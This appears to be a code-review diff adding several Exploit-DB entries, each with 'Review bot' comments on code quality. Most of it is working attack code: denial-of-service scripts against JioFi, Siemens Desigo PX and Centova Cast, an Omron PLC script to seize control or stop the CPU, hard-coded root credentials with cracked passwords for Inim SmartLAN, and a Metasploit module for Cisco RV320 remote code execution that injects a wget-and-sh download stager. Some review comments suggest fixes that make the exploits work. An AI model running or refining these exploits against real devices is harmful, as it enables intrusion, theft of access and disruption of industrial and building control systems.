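Review bot: the bare `except:` swallows every exception, including KeyboardInterrupt, and hides the reason the file could not be created; catch `IOError`/`OSError` and print the exception instead. The Python 2 `print` statements tie the script to a Python 2 interpreter; for a generator this small, `print(...)` would make it run under either version. Using `with open("qnap.txt", "w") as f:` would also guarantee the file is closed when write() fails.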


@ -0,0 +1,66 @@
# Exploit Title: cgi-bin/qcmap_web_cgi on JioFi 4G M2S 1.0.2 devices allows a DoS (Hang) via the mask POST parameter
# Exploit Author: Vikas Chaudhary
# Date: 21-01-2019
# Vendor Homepage: https://www.jio.com/
# Hardware Link: https://www.amazon.in/JioFi-Hotspot-M2S-Portable-Device/dp/B075P7BLV5/ref=sr_1_1?s=computers&ie=UTF8&qid=1531032476&sr=1-1&keywords=JioFi+M2S+Wireless+Data+Card++%28Black%29
# Version: JioFi 4G Hotspot M2S 150 Mbps Wireless Router
# Category: Hardware
# Contact: https://www.facebook.com/profile.php?id=100011287630308
# Web: https://gkaim.com/
# Tested on: Windows 10 X64- Firefox-65.0
# CVE-2019-7439
***********************************************************************
## Vulnerability Description :- A denial-of-service attack (DoS attack) is a cyber-attack in which the perpetrator seeks to make a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting services of a host connected to the Internet. Denial of service is typically accomplished by flooding the targeted machine or resource with superfluous requests in an attempt to overload systems and prevent some or all legitimate requests from being fulfilled.
----------------------------------------
# Proof Of Concept:
1- First Open BurpSuite
2- Make Intercept on
3 -Go to your Wifi Router's Gateway in Browser [i.e http://192.168.225.1 ]
4-Capture the data and then Spider the Host
5- Now You find a Link like this [ http://192.168.225.1/cgi-bin/qcmap_web_cgi ]
6- Send it to repeter Now you will find parameter like this [ Page=GetWANInfo&mask=0&token=0 ]
7-Vulnerable parameter is => mash
8-Paste this PAYLOD in mask parameter and then show Response in browser
Payload =>
<iframe src="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;"></iframe>
9-Now it will show => {"commit":"Socket Connect Error"}
10-- It Means Router is Completely Stopped ,
----------------------------------------
Vulnerable URL => Post Based => http://192.168.225.1/cgi-bin/qcmap_web_cgi => mask parameter
-----------------------------------------
Solution:-
You have to Remove your battery and then again insert it to make Normal.
-----------------------------------------------------------------------------------
REQUEST
------------
POST /cgi-bin/qcmap_web_cgi HTTP/1.1
Host: 192.168.225.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.225.1/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 167
Connection: close
Page=GetWANInfo&mask=<iframe src="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;"></iframe>&token=0
****************************
RESPONSE
----------
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
X-Frame-Options: SAMEORIGIN
connection: close
Content-Type: text/html
Content-Length: 33
Date: Mon, 21 Jan 2019 18:17:34 GMT
Server: lighttpd/1.4.35
{"commit":"Socket Connect Error"}
---------------------------------------------------------------------------------------------------------------
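Review bot: step 7 names the vulnerable parameter as `mash`, while the request body and the `Vulnerable URL` line both use `mask`; fix the typo so the steps match the captured request. The body is also sent as `application/x-www-form-urlencoded` without encoding: every `&#x..;` entity inside the `mask` value starts with `&`, which is a form-field separator, so what the CGI parses is `mask=<iframe src="` followed by a series of stray fields (`#x6a;`, `#x61;`, ...) rather than the string step 8 shows (the `Content-Length: 167` matches the raw text, so this is what was actually sent); the write-up should state which value the server really received. Finally, `Solution:` describes a recovery step (pull the battery), not a fix, and the only evidence of impact in the hunk is the single `{"commit":"Socket Connect Error"}` body returned with `200 OK`; the device model and firmware version should be recorded alongside that observation.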

@ -0,0 +1,109 @@
# Title: Siemens Desigo PX 6.00 - Denial of Service (PoC)
# Author: LiquidWorm
# Date: 2019-11-14
# Vendor web page: https://www.siemens.com
# Product web page: https://new.siemens.com/global/en/products/buildings/automation/desigo.html
# Affected version:6.00
# Affected version: Model: PXC00-E.D, PXC50-E.D, PXC100-E.D, PXC200-E.D
# With Desigo PX Web modules: PXA40-W0, PXA40-W1, PXA40-W2
# All firmware versions < V6.00.320
# ------
# Model: PXC00-U, PXC64-U, PXC128-U
# With Desigo PX Web modules: PXA30-W0, PXA30-W1, PXA30-W2
# All firmware versions < V6.00.320
# ------
# Model: PXC22.1-E.D, PXC36-E.D, PXC36.1-E.D
# With activated web server
# All firmware versions < V6.00.320
# CVE: N/A
# Advisory ID: ZSL-2019-5542
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5542.php
#!/bin/bash
#
#
# Siemens Desigo PX V6.00 Web Remote Denial of Service Exploit
#
#
# Vendor: Siemens AG
# Vendor web page: https://www.siemens.com
# Product web page: https://new.siemens.com/global/en/products/buildings/automation/desigo.html
#
# Summary: Desigo PX is a modern building automation and control
# system for the entire field of building service plants. Scalable
# from small to large projects with highest degree of energy efficiency,
# openness and user-friendly operation.
#
# Desc: The device contains a vulnerability that could allow an attacker
# to cause a denial of service condition on the device's web server
# by sending a specially crafted HTTP message to the web server port
# (tcp/80). The security vulnerability could be exploited by an attacker
# with network access to an affected device. Successful exploitation
# requires no system privileges and no user interaction. An attacker
# could use the vulnerability to compromise the availability of the
# device's web service. While the device itself stays operational, the
# web server responds with HTTP status code 404 (Not found) to any further
# request. A reboot is required to recover the web interface.
#
# Tested on: HP StorageWorks MSL4048 httpd
#
# ================================================================================
# Expected result after sending the directory traversal sequence: /dir?dir=../../:
# --------------------------------------------------------------------------------
#
# $ curl http://10.0.0.17/index.htm
# <HEAD><TITLE>404 Not Found</TITLE></HEAD>
# <BODY><H1>404 Not Found</H1>
# Url '/INDEX.HTM' not found on server<P>
# </BODY>
#
# ================================================================================
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Zero Science Lab - https://www.zeroscience.mk
# @zeroscience
#
#
#
# Vendor ID: SSA-898181
# Vendor Fix: https://support.industry.siemens.com/cs/document/109772802
# Vendor Advisory PDF: https://cert-portal.siemens.com/productcert/pdf/ssa-898181.pdf
# Vendor Advisory TXT: https://cert-portal.siemens.com/productcert/txt/ssa-898181.txt
# Vendor ACK: https://new.siemens.com/global/en/products/services/cert/hall-of-thanks.html
#
# CWE ID: CWE-472: External Control of Assumed-Immutable Web Parameter
# CWE URL: https://cwe.mitre.org/data/definitions/472.html
# CVE ID: CVE-2019-13927
# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13927
# CVSS v3.1 Base Score: 5.3
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:H/RL:O/RC:C
#
#
# 06.06.2019
#
echo -ne "\n----------------------------------"
echo -ne "\nSiemens Desigo PX HTTP Web RMI DoS"
echo -ne "\n----------------------------------\n"
if [ "$#" -ne 1 ]; then
echo -ne "\nUsage: $0 [ipaddr]\n\n"
exit
fi
IP=$1
TARGET="http://$IP/"
PAYLOAD=`echo -ne "\x64\x69\x72\x3f\x64\x69\x72\x3d\x2e\x2e\x2f\x2e\x2e\x2f"`
echo -ne "\n[+] Sending payload to $IP on port 80."
curl -s "$TARGET$PAYLOAD" > /dev/null
echo -ne "\n[*] Done"
echo -ne "\n[+] Checking if exploit was successful..."
status=$(curl -Is http://$IP/index.htm 2>/dev/null | head -1 | awk -F" " '{print $2}')
if [ "$status" == "404" ]; then
echo -ne "\n[*] Exploit successful!\n"
else
echo -ne "\n[-] Exploit unsuccessful.\n"
exit
fi
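Review bot: the `# Tested on: HP StorageWorks MSL4048 httpd` line names a different product from the Siemens Desigo PX this advisory covers and looks like a leftover from another template; it should name the Desigo PX web module and firmware that was actually tested (the header lists the PXA40/PXA30 web modules and firmware < V6.00.320). Because the Exploit-DB header is prepended, `#!/bin/bash` is no longer the first line, so it is only a comment and the script runs under whatever shell invokes it; `[ "$status" == "404" ]` is a bash-only comparison (`=` is the POSIX form), and the usage and failure branches should `exit 1` rather than a plain `exit` so callers can distinguish outcomes. The `PAYLOAD` built from `\x64\x69...` is just the `dir?dir=../../` string the comment at `# Expected result after sending the directory traversal sequence` already spells out; writing it literally would make the script easier to review.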

32
exploits/hardware/dos/47677.sh Executable file
@ -0,0 +1,32 @@
# Exploit Title: Centova Cast 3.2.12 - Denial of Service (PoC)
# Date: 2019-11-18
# Exploit Author: DroidU
# Vendor Homepage: https://centova.com
# Affected Version: <=v3.2.12
# Tested on: Debian 9, CentOS 7
# ===============================================
# The Centova Cast becomes out of control and causes 100% CPU load on all cores.
#!/bin/bash
if [ "$3" = "" ]
then
echo "Usage: $0 centovacast_url reseller/admin password"
exit
fi
url=$1
reseller=$2
pass=$3
dwn() {
echo -n .
curl -s -k --connect-timeout 5 -m 5 "$url/api.php?xm=system.database&f=json&a\[username\]=&a\[password\]=$reseller|$pass&a\[action\]=export&a\[filename\]=/dev/zero" &
}
for i in {0..32}
do
dwn /dev/zero
sleep .1
done
echo "
Done!"
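Review bot: `dwn()` ignores its positional argument; the call `dwn /dev/zero` passes a path the function never reads because `a[filename]=/dev/zero` is hard-coded in the URL, so either drop the argument or reference `$1` in the request. `for i in {0..32}` runs 33 iterations, not 32, and `i` is unused. The requests are backgrounded with `&` but the script never `wait`s, so `Done!` is printed before any of them completes and no curl exit status is checked. As with the other scripts in this commit, the Exploit-DB header pushes `#!/bin/bash` off the first line, leaving it as a comment rather than an interpreter directive.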

197
exploits/hardware/dos/47757.py Executable file
@ -0,0 +1,197 @@
# Exploit Title: Omron PLC 1.0.0 - Denial of Service (PoC)
# Google Dork: n/a
# Date: 2019-12-06
# Exploit Author: n0b0dy
# Vendor Homepage: https://automation.omron.com, ia.omron.com
# Software Link: n/a
# Version: 1.0.0
# Tested on: PLC f/w rev.: CJ2M (v2.01)
# CWE-412 : Unrestricted Externally Accessible Lock
# CVE : n/a
#!usr/bin/python
######################################################################################################
# #
# `-:+oyhdmmNNNNNNNNmdhyso/:. #
# -/shmNmhyo+/:-..`````..--:/oshdNNdyo:. #
# `:ohNmho/-` .:+ydNmy+. #
# .+hNms/. `:ohNms:` #
# .+dNh+. `/ymNy: #
# :yNd+. `/yNmo. #
# `/dNy-` .+mNy- #
# +mmo. `/dNy- #
# :dNo` ``........--.......``` `/dNs. #
# .yNy. .- ``....```....``..``....```...`` `-` `+Nm/ #
# /mm: ./ymy. `...`` `..` `` .` `` `..` `...` +mho:` .yMh. #
# `sNy. `.`/hNMNo` `..` `.` .` .` `` `.. `...` -dMNmo... `+Nm: #
# `yNo` -yy-sMMMh- ......```.` .` .` `` .-...`` `..` `+NMMm:+h+` :mN/ #
# `hN/ +Nm.sMMh/: `.. `.....```..` `//+yy+.``.``...`..` `.. ./oNMm-oMh. -dN+ #
# `hN+ `/MMo:Nh:/h- `..` .. `..```oMy.:NMd```. .. `.` ys:omh.NMh` .mM/ #
# yM+ `o-hMN.:+sdm/ `-. .. .` ./-./NNo .` .. `.` .hmy+/`sMM-o- -mN: #
# +My .dd`mMy/hNmo. `-````` `. `- :ho. `. .. ````.. `/hNmo/NM//N/ :Mm` #
# .mm. sMd`mMmNd+/` `-` ``..-.``` .. +. .` ``.-...`` .. :/yNNNM/:MN` sMs #
# yM+ `mMm`mMm+-ss `-` ..```.....-....```-o+.```...-.....```.-` .` -h/:yMM/+MM/ .mN- #
# .Nm` `NMN`yo/yNd. .. -` `-```````yNm-```````. `-` `. oNd++h:sMM+ oMy #
# +Mo `.NMM.:hNMd. `-` `. .- `:- `- .. .` `oNMmo`yMM+. .NN` #
# hN- y:hMMoNMmo. .. .` .. .` - `- `. /hMMydMM-h. dM/ #
# .mm`-No-NMMMy-o: .. .` .. .://-` ` -` `-` - y-+mMMMy.Ns sMs #
# :Nd :Mm.oMMo.sN. ..`````````-`````````..`./s` :smds: :s:``-`````````-.`````````-` ym--NMm.sMh +Mh #
# +Mh -NMy`hd-hMd` ..`````````-```````.-/+smMy -my` `dNho/.````````-``````````- /Mm/+N:-NMs /Mh #
# /Nh hMM/-/hMM/ .. .` `+yhdmmNMMMM. .so` yMMMNmhyso+/.`-` `- `mMN/+.dMM- /Mh #
# -Nd` -NMm-+MMh. `. .` oMMMMMMMMMMN` `hy yMMMMMMMMMMMd.- `. `/MMd`yMMy oMy #
# `mN.`.oNMhyMN-o/ -` `.`mMMMMMMMMMMM- -NN. `dMMMMMMMMMMMM/. .` `y`hMNoMMh.- yMo #
# yM:.h./mMMMs dm` `. .+MMMMMMMMMMMMo /MM/ :NMMMMMMMMMMMMs` `. oN--NMMNy.+o`mM- #
# /My`dd/-yNM:.NM+ .. ``.hMMMMMMMMMMMMN- oMMo `hMMMMMMMMMMMMMh.` `.` `mMo`dMm/-yN/:Mm` #
# `mN./MMh-/d/+MMs .` ``````.NMMMMMMMMMMMMMm- sMMs oMMMMMMMMMMMMMMm.````` `.` -NMd`ds-omMh`hMo #
# +Ms oNMNo--sMMh`- ..` oMMMMMMMMMMMMMMMm:yMMhoMMMMMMMMMMMMMMMN- `..` `-:MMN.:/dMMd.:Nm. #
# `hN: /NMMm/+MMm`h+ .. mMMMMMMMMMMMMMMMMNNMMMMMMMMMMMMMMMMMMMMo `.` -h-oMMd-yMMMy.`dM/ #
# -Nm. +yNMMdNMN-/Ms` `.` -MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMh .. :mh`hMMdNMNdo- sMy #
# /Nh`:y+odNMMMo`mMy ..`/MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMm``.` :NM/.NMMMmy+os`oMd. #
# +Mh`+Nh//odNm`oMM+ `.sMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMN.` .mMN`oNmy+/smh`+Mm. #
# +Nh./mMNho++-.mMN/-/` hMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM- `-:.dMMo`+++ymMNs.oNd- #
# /Nd-.omMMMmy+/dMN//ds-hMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM//hy-dMNs:sdMMMNh:`sMh. #
# -dN+``/ymNMMNdmMMo/mNdNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNMs:mMNdmMMNmh+. -dMs` #
# `yNy. /o+/oyhmmNNy:hNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMm//mNNmdys+/+o.`oNm/ #
# :mNo`:dmdyo////+:./yNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMdo--+//:/+shmmo.:dNy. #
# `+mm+.:smNMMMMMMMMNNNNmmMMMMMMMMMMMMMMMMMMMMMMMMMMNhmNNNNMMMMMMMMMNh+.:hNh- #
# `oNmo.`.+ooooo+//:--:yMMMMMMMMMMMMMMMMMMMMMMMMMMmo/--::/++ooooo:``/hNd: #
# `+mNs:.+yso++oshmMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNdys+++oys:.odNh: #
# :yNdo-/sdNNMMMNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMdmNNMMNNmy+:/hNmo. #
# `+hNds:``...`/MMMMMMMMMMMMMMMMMMMMMMMMMMMM: `....`-ohNms: #
# `/ymNds/.`sMMMMMMMMMMMMMMMMMMMMMMMMMMMM+ `:ohNNdo- #
# ./sdNNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMdhmNNho:` #
# `-/oydNMMMMMMMMMMMMMMMMMMMMMMmhy+:. #
# `.://+osyyyyyyso+/:-. #
# #
# #
# Exploit Title: Omron PLC: Denial-of-Service as a Feature #
# Google Dork: n/a #
# Date: 2019.12.06 #
# Exploit Author: n0b0dy #
# Vendor Homepage: https://automation.omron.com, ia.omron.com #
# Software Link: n/a #
# Version: 1.0.0 #
# Tested on: PLC f/w rev.: CJ2M (v2.01) #
# CWE-412 : Unrestricted Externally Accessible Lock #
# CVE : n/a #
# #
#######################################################################################################
import sys, signal, socket, time, binascii
nic = socket.gethostbyname(socket.gethostname()) #will fail if hostname = 'hostname'
if len(sys.argv) < 2:
print "Usage: fins.dos.py [arg.] {target ip} {target port[9600]}"
print "--pwn Hijack control of PLC program."
print "--stop Stop PLC CPU."
else:
ip = sys.argv[2]
try:
port = sys.argv[3]
except:
port = 9600
def ip_validate(ip):
a = ip.split('.')
if len(a) != 4:
return False
for x in a:
if not x.isdigit():
return False
i = int(x)
if i < 0 or i > 255:
return False
return True
#fins header
icf = '\x80' #info control field (flags); 80=resp req, 81=resp not req
rsv = '\x00' #reserved
gct = '\x02' #gateway count
dna = '\x00' #dest net addr
idnn = ip[-1:] #dest node no (last digit of target ip)
dnn_i = '0' + idnn
dnn = binascii.a2b_hex(dnn_i)
dua = '\x00' #dest unit addr
sna = '\x00' #source net addr
isnn = nic[-1:] #source node no (last digit of own ip)
snn_i = '0' + isnn
snn = binascii.a2b_hex(snn_i)
sua = '\x00' #source unit addr
sid = '\x7a' #service ID
fins_hdr = icf + rsv + gct + dna + dnn + dua + sna + snn + sua + sid
#FINS command acceptance code
fins_ok = '\x00'
#Verify PLC type
CmdMRst1 = binascii.a2b_hex("05")
CmdSRst1 = binascii.a2b_hex("01")
Cmdst1 =\
fins_hdr + CmdMRst1 + CmdSRst1 + '\x00'
print "Probing PLC... " + '\t'
s1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s1.sendto(Cmdst1, (ip, port))
print "Finished." + '\r\n'
s1fins_resp = s1.recvfrom(1024)
s1fins_resp_b = bytes(s1fins_resp[0])
if s1fins_resp_b[12] == fins_ok and s1fins_resp_b[13] == fins_ok:
print "FINS target is exploitable: "
print s1fins_resp_b[14:39]
else:
print "FINS target not exploitable."
print "FINS response from target: ", s1fins_resp
if sys.argv[1] == "--pwn":
#access right forced acquire
PgmNo = '\xff'
CmdMRst2 = binascii.a2b_hex("0c")
CmdSRst2 = binascii.a2b_hex("02")
Cmdst2 =\
fins_hdr + CmdMRst2 + CmdSRst2 + PgmNo + PgmNo
reqdly = 1
persist = 1
pwnage = 0
print "Obtaining control of PLC program..." + '\r\n'
while persist == 1:
try:
s2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
time.sleep(reqdly)
s2.sendto(Cmdst2, (ip, port))
s2fins_resp = s2.recvfrom(1024)
s2fins_resp_b = bytes(s2fins_resp[0])
if s2fins_resp_b[12] == fins_ok and s2fins_resp_b[13] == fins_ok:
pwnage += 1
pwntime = str(pwnage)
sys.stdout.write('\r' + "Pwnage in progress! " + "duration: " + pwntime + " sec.")
sys.stdout.flush()
else:
print "Attack unsuccessful. ", '\r\n'
print "FINS error code: ", s2fins_resp
except socket.error as e:
print socket.error
s2.close()
except KeyboardInterrupt:
persist = 0
print '\r', " Attack interrupted by user."
s2.close()
elif sys.argv[1] == "--stop":
#change OP Mode
CmdMRst3 = binascii.a2b_hex("04")
CmdSRst3 = binascii.a2b_hex("02")
Cmdst3 =\
fins_hdr + CmdMRst3 + CmdSRst3
print "Stopping PLC (just for fun)... " + '\t'
s3 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s3.sendto(Cmdst3, (ip, port))
print "Finished. "
s3fins_resp = s3.recvfrom(1024)
s3fins_resp_b = bytes(s3fins_resp[0])
if s3fins_resp_b[12] == fins_ok and s3fins_resp_b[13] == fins_ok:
print "PLC CPU STOP mode confirmed. "
else:
print "Attack unsuccessful. ", '\r\n'
print "FINS response from target: ", s3fins_resp
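Review bot: `port = sys.argv[3]` keeps the port as a string, and `socket.sendto` requires an integer in the address tuple, so every `sendto` call raises `TypeError` whenever a port is given on the command line; only the default `port = 9600` path works, and the value should be wrapped in `int()`. The node-number derivation at `idnn = ip[-1:]` takes the last character of the dotted string, not the last octet, so the `dest node no (last digit of target ip)` comment is wrong for any host octet above 9 (`.10` yields node `0`); the same applies to `isnn = nic[-1:]`. `ip_validate()` is defined but never called, the usage check `len(sys.argv) < 2` still lets `ip = sys.argv[2]` raise `IndexError` when only the flag is supplied, `except socket.error as e: print socket.error` prints the class rather than `e`, and the shebang `#!usr/bin/python` is missing its leading `/`. The `print` statements are Python 2 only.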

@ -0,0 +1,79 @@
# Exploit Title: Inim Electronics Smartliving SmartLAN 6.x - Hard-coded Credentials
# Exploit Author: LiquidWorm
# Date: 2019-12-09
# Product web page: https://www.inim.biz
# Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving?
# Advisory ID: ZSL-2019-5546
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5546.php
Inim Electronics Smartliving SmartLAN/G/SI <=6.x Hard-coded Credentials
Vendor: INIM Electronics s.r.l.
Product web page: https://www.inim.biz
Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving?
Affected version: <=6.x
Affected models: SmartLiving 505
SmartLiving 515
SmartLiving 1050, SmartLiving 1050/G3
SmartLiving 10100L, SmartLiving10100L/G3
Summary: SmartLiving anti-intrusion control panel and security system provides
important features rarely found in residential, commercial or industrial application
systems of its kind. This optimized-performance control panel provides first-rate
features such as: graphic display, text-to-speech, voice notifier, flexible hardware,
end-to-end voice transmission (voice-on-bus), IP connectivity.
SMARTLAN/SI:
The system-on-chip platform used in the SmartLAN/SI accessory board provides point-to-point
networking capability and fast connectivity to the Internet. Therefore, it is possible
to set up a remote connection and program or control the system via the SmartLeague
software application. In effect, the SmartLAN/SI board grants the same level of access
to the system as a local RS232 connection.
SMARTLAN/G:
The SmartLAN/G board operates in the same way as the SmartLAN/SI but in addition provides
advanced remote-access and communication functions. The SmartLAN/G board is capable of
sending event-related e-mails automatically. Each e-mail can be associated with a subject,
an attachment and a text message. The attachment can be of any kind and is saved to an
SD card. The message text can contain direct links to domains or IP addressable devices,
such as a security cameras. In addition to e-mails, the SmartLAN/G board offers users
global access to their control panels via any Internet browser accessed through a PC,
PDA or Smartphone. In fact, the SmartLAN/G has an integrated web-server capable of
distinguishing the means of connection and as a result provides an appropriate web-page
for the tool in use. Smartphones can control the system in much the same way as a
household keypad, from inside the house or from any part of the world.
Desc: The devices utilizes hard-coded credentials within its Linux distribution image.
These sets of credentials (Telnet, SSH, FTP) are never exposed to the end-user and cannot
be changed through any normal operation of the smart home device. Attacker could exploit
this vulnerability by logging in and gain system access.
Tested on: GNU/Linux 3.2.1 armv5tejl
Boa/0.94.14rc21
BusyBox v1.20.2
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5546
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5546.php
06.09.2019
--
# cat /etc/passwd
root:$1$$uqbusDeGY2YWqg.T2S1100:0:0:administrator:/:/bin/sh
nobody:*:254:254:nobody:/var/empty:/bin/sh
logout:gfr8cijmRSDck:498:506:logout:/:
# john --show /etc/passwd
root:pass:0:0:administrator:/:/bin/sh
logout:logout:498:506:logout:/:
2 password hashes cracked, 0 left
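Review bot: the `Desc:` paragraph states the hard-coded credentials are usable over Telnet, SSH and FTP, but the proof only shows `cat /etc/passwd` and the `john --show` output; nothing in the hunk demonstrates which of those services are listening or that the accounts are accepted by them, so either add that evidence or narrow the claim. The advisory also carries no vendor response, fix or mitigation field (unlike the Desigo PX advisory above, which lists `Vendor Fix:`), and the `Advisory ID` / `Advisory URL` lines are duplicated between the Exploit-DB header and the advisory body. Minor grammar: "The devices utilizes" and "by logging in and gain system access".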

207
exploits/hardware/remote/46655.rb Executable file
@ -0,0 +1,207 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::CmdStager
def initialize(info={})
super(update_info(info,
'Name' => "Cisco RV320 and RV325 Unauthenticated Remote Code Execution",
'Description' => %q{
This exploit module combines an information disclosure (CVE-2019-1653)
and a command injection vulnerability (CVE-2019-1652) together to gain
unauthenticated remote code execution on Cisco RV320 and RV325 small business
routers. Can be exploited via the WAN interface of the router. Either via HTTPS
on port 443 or HTTP on port 8007 on some older firmware versions.
},
'License' => MSF_LICENSE,
'Author' => [
'RedTeam Pentesting GmbH', # Discovery, Metasploit
'Philip Huppert', # Discovery
'Benjamin Grap' # Metasploit
],
'References' => [
[ 'CVE','2019-1653' ],
[ 'CVE','2019-1652' ],
[ 'EDB','46243' ],
[ 'BID','106728' ],
[ 'BID','106732' ],
[ 'URL', 'https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-002/-cisco-rv320-unauthenticated-configuration-export' ],
[ 'URL', 'https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-004/-cisco-rv320-command-injection' ]
],
'Platform' => 'linux',
'Targets' =>
[
[ 'LINUX MIPS64',
{
'Platform' => 'linux',
'Arch' => ARCH_MIPS64
}
]
],
'Payload' =>
{
'BadChars' => ""
},
'CmdStagerFlavor' => [ 'bourne' ],
'Privileged' => true,
'DisclosureDate' => "Sep 9 2018",
'DefaultTarget' => 0))
register_options([
Opt::RPORT(8007), # port of Cisco webinterface
OptString.new('URIPATH', [true, 'The path for the stager. Keep set to default! (We are limited to 50 chars for the initial command.)', '/']),
OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 15]),
OptBool.new('USE_SSL', [false, 'Negotiate SSL/TLS for outgoing connections', false]) # Don't use 'SSL' option to prevent HttpServer from picking this up.
])
deregister_options('SSL') # prevent SSL in HttpServer and resulting payload requests since the injected wget command will not work with '--no-check-certificate' option.
deregister_options('SSLCert') # not required since stager only uses HTTP.
end
def execute_command(cmd, opts = {})
# use generated payload, we don't have to do anything here
end
def autofilter
true
end
def on_request_uri(cli, req)
print_status("#{peer} - Payload request received: #{req.uri}")
@cmdstager = generate_cmdstager().join(';')
send_response(cli, "#{@cmdstager}")
end
def primer
payload_url = get_uri
print_status("Downloading configuration from #{peer}")
if(datastore['USE_SSL'])
print_status("Using SSL connection to router.")
end
res = send_request_cgi({
'uri' => normalize_uri("cgi-bin","config.exp"),
'SSL' => datastore['USE_SSL']
})
unless res
vprint_error('Connection failed.')
return nil
end
unless res.code == 200
vprint_error('Could not download config. Aborting.')
return nil
end
print_status("Successfully downloaded config")
username = res.body.match(/^USERNAME=([a-zA-Z]+)/)[1]
pass = res.body.match(/^PASSWD=(\h+)/)[1]
authkey = "1964300002"
print_status("Got MD5-Hash: #{pass}")
print_status("Loging in as user #{username} using password hash.")
print_status("Using default auth_key #{authkey}")
res2 = send_request_cgi({
'uri' => normalize_uri("cgi-bin","userLogin.cgi"),
'SSL' => datastore['USE_SSL'],
'method' => 'POST',
'data' => "login=true&portalname=CommonPortal&password_expired=0&auth_key=#{authkey}&auth_server_pw=Y2lzY28%3D&submitStatus=0&pdStrength=1&username=#{username}&password=#{pass}&LanguageList=Deutsch&current_password=&new_password=&re_new_password="
})
unless res
vprint_error('Connection failed during login. Aborting.')
return nil
end
unless res.code == 200
vprint_error('Login failed with downloaded credentials. Aborting.')
return nil
end
#Extract authentication cookies
cookies = res2.get_cookies()
print_status("Successfully logged in as user #{username}.")
print_status("Got cookies: #{cookies}")
print_status("Sending payload. Staging via #{payload_url}.")
#Build staging command
command_string = CGI::escape("'$(wget -q -O- #{payload_url}|sh)'")
if(command_string.length <= 63)
print_status("Staging command length looks good. Sending exploit!")
else
vprint_error("Warning: Staging command length probably too long. Trying anyway...")
end
res3 = send_request_cgi({
'uri' => normalize_uri("certificate_handle2.htm"),
'SSL' => datastore['USE_SSL'],
'method' => 'POST',
'cookie' => cookies,
'vars_get' => {
'type' => '4',
},
'vars_post' => {
'page' => 'self_generator.htm',
'totalRules' => '1',
'OpenVPNRules' => '30',
'submitStatus' => '1',
'log_ch' => '1',
'type' => '4',
'Country' => 'A',
'state' => 'A',
'locality' => 'A',
'organization' => 'A',
'organization_unit' => 'A',
'email' => 'any@example.com',
'KeySize' => '512',
'KeyLength' => '1024',
'valid_days' => '30',
'SelectSubject_c' => '1',
'SelectSubject_s' => '1'
},
'data' => "common_name=#{command_string}"
})
unless res3
vprint_error('Connection failed while sending command. Aborting.')
return nil
end
unless res3.code == 200
vprint_error('Sending command not successful.')
return nil
end
print_status("Sending payload timed out. Waiting for stager to connect...")
end
def check
#Check if device is vulnerable by downloading the config
res = send_request_cgi({'uri'=>normalize_uri("cgi-bin","config.exp")})
unless res
vprint_error('Connection failed.')
return CheckCode::Unknown
end
unless res.code == 200
return CheckCode::Safe
end
unless res.body =~ /PASSWD/
return CheckCode::Detected
end
CheckCode::Vulnerable
end
def exploit
# Main function.
# Setting delay for the Stager.
Timeout.timeout(datastore['HTTPDELAY']) {super}
rescue Timeout::Error
print_status("Waiting for stager connection timed out. Try increasing the delay.")
end
end
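Review bot: the login result is never checked. After `res2 = send_request_cgi({` for `userLogin.cgi`, the guards `unless res` and `unless res.code == 200` test the earlier config-download response `res` rather than `res2`, so a failed login is silently ignored and `res2.get_cookies()` raises on a nil response; both checks should reference `res2`. `check` requests `config.exp` without the `'SSL' => datastore['USE_SSL']` setting that `primer` uses, so it can report `Unknown` on devices that only answer over HTTPS. `execute_command` is deliberately empty because staging happens via `on_request_uri`; that design choice deserves a sentence in `Description`. Typo: "Loging in".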

139
exploits/hardware/remote/46678.py Executable file
@ -0,0 +1,139 @@
#Author Grzegorz Wypych - h0rac
